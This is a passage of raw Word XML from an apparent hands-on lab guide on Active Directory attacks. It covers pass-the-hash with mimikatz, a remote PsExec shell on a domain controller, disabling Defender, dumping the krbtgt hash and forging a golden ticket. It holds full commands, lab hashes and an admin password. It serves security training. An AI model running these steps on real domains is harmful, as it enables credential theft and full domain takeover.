      <w:r w:rsidRPr="00752BB1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>AdminC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00752BB1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> account. Note the NTLM hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E15000B" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66AF91F7" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="00D6048F" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AF20390" wp14:editId="017F7293">
            <wp:extent cx="5943600" cy="2857331"/>
            <wp:effectExtent l="0" t="0" r="0" b="6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7331"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="787FA71D" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="543B0370" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="002E5103" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E5103">
        <w:t>We will authenticate using the NTLM hash for the domain administrator account. To do this we will run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FFBBEC" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="002E5103" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="14836EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sekurlsa::pth    /user:AdminCSI     /domain:contoso /ntlm:a5439733d225c47d647b023ee9fb52d4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD93D93" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="115B1AEA" wp14:editId="6F244E9C">
            <wp:extent cx="5943600" cy="2259669"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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59669"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="681C1F85" w14:textId="0BE5874D" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00973E31">
        <w:t xml:space="preserve">A new </w:t>
      </w:r>
      <w:r w:rsidR="00BF1E59">
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00973E31">
        <w:t xml:space="preserve"> will open which will run with a token which was issued for the domain administrator</w:t>
      </w:r>
      <w:r>
        <w:t>. You can then connect to DC1 using PsExec and lunch a cmd remotely on the server by doing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F21978" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE11AD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cd \tools\TD11\PsExec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C7D680" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.\P</w:t>
      </w:r>
      <w:r w:rsidRPr="003113C8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sExec.exe </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="003113C8">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:b/>
          </w:rPr>
          <w:t>\\csi-td11-dc1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003113C8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487CD866" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Enter </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78868A1B" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EE8A693" wp14:editId="1E4B4D37">
            <wp:extent cx="5943600" cy="2360380"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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60380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6D31D5" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Enter </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and check the value </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>COMPUTERNAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641D9450" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>You should see :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00581F65">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>COMPUTERNAME=CSI-TD11-DC1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCFBC65" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00581F65">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49DDFB77" wp14:editId="6404DED1">
            <wp:extent cx="3708591" cy="2013053"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="11" name="Picture 11" descr="A picture containing tabl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8591" cy="2013053"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="057B47C9" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Close the session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657D9C5F" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc43911777"/>
      <w:bookmarkStart w:id="22" w:name="_Toc44074057"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 2: Pass the Golden Ticket</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="1EE4C4C0" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Logon to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CSI-TD11-DC1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495CC43A" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Username: </w:t>
      </w:r>
      <w:r w:rsidRPr="0001432C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CSI@contoso.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E0D40B" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="004F0702" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PiKarAlR@AlBenMo1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50907649" w14:textId="7C104A5C" w:rsidR="00417BF1" w:rsidRPr="007C1E43" w:rsidRDefault="00417BF1" w:rsidP="00417BF1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ensure that the computer has no pending update if necessary, update the machine and Reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA41BFC" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Download the latest version of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Mimikatz </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>in the folder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> c:\tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D25767" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="00A608B1" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="008719B9">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200519</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="217007DA" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Choose the zip version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E9EC5E" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to the </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c:\Tools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> folder and unzip </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661DB880" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Launch </w:t>
      </w:r>
      <w:r w:rsidRPr="009A7BF3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Windows Powershell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in admin mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3BE4FD" w14:textId="5E2223AB" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Disabling Antivirus software is not recommended </w:t>
      </w:r>
      <w:r w:rsidR="00417BF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">but </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>it is necessary for this exercise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCC7343" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable Antivirus using </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476E9167" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004B7CBE">
        <w:t>Set-MpPreference -DisableRealtimeMonitoring $true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CD01DE" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C:\Tools\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Folder where Mimikatz has been unzip</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>\x64</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6D10" w:rsidDel="00CA6D10">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECD9F9B" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\Tools\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Folder where Mimikatz has been unzip</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0170BDD3" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Do not use the version </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>in the folder c:\tools\td11\mimikatz\x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2F0A30" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Launch </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5D06">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A6B8AA" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.\mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47074645" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Obtain privilege debug mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1FB049" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="009A7BF3" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A7BF3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BADDF3" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dump the password hash for </w:t>
      </w:r>
      <w:r w:rsidRPr="009A7BF3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E18FD0" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="009A7BF3" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A7BF3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>lsadump::lsa /inject /name:krbtgt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525704EA" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29E4E8EB" wp14:editId="4DC855EA">
            <wp:extent cx="5943600" cy="3000417"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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00417"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6463A4" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now you can create a ticket using </w:t>
      </w:r>
      <w:r w:rsidRPr="00744EAC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:r>
        <w:t>. You can create it for a valid user or for an inexistent one. In the following example I’m going to create a ticket for a user that does not exist in AD. I will be also be providing the default Administrator ID. We will see later how this comes into play.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794F7439" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="00C10978" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C10978">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kerberos::golden /domain:contoso.com /sid:</w:t>
      </w:r>
      <w:r w:rsidRPr="0006277A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0006277A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>S-1-5-21-763771787-3275511796-3841611663</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10978">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/rc4:d2b551f3dad7310a5c9171976e44cc62 /user:FakeUser /id:500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782AB367" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1994C3FB" wp14:editId="7B2F4314">
            <wp:extent cx="5943600" cy="1157351"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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157351"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19316AA2" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="008B08E2" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008B08E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidRPr="008B08E2">
        <w:t xml:space="preserve"> – The name of the user account the ticket will be created for. This can be a real account name but it doesn’t have to be.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D49834" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="008B08E2" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
